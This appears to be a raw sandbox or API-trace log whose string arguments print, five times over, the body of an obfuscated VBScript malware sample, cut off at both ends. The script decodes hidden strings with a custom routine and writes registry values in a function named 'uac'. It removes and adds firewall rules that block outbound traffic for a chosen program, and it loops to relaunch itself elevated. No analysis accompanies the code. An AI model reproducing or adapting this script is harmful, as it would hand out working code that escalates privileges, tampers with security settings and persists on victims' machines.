bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 87 [0226.306] wcsncmp (_String1="(s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 27 [0226.306] wcsncmp (_String1="s1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 102 [0226.307] wcsncmp (_String1="1,1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 36 [0226.307] wcsncmp (_String1=",1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 31 [0226.307] wcsncmp (_String1="1,1))-65)*25 + (asc(Mid(s1,2,1))-65)-x4-id)\r\n\x09\x09s1 = Mid(s1,3,Len(s1)-2)\r\n\x09wend \r\n\x09bmw = sr\r\nEnd Function\r\n\r\n\r\n\r\nFunction criarregra(str1,str2)\r\ndim rule\r\nConst ACTION_BLOCK = 0\r\nConst PROTOCOL_TCP = 6\r\nconst NET_FW_RULE_DIR_OUT = 2\r\nDim policy\r\nSet policy = CreateObject(bmw(\"LDSDYEWFMDNEXEYCRDQFPEBFHFEFBEUFRCV\"))\r\nDim rules\r\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim 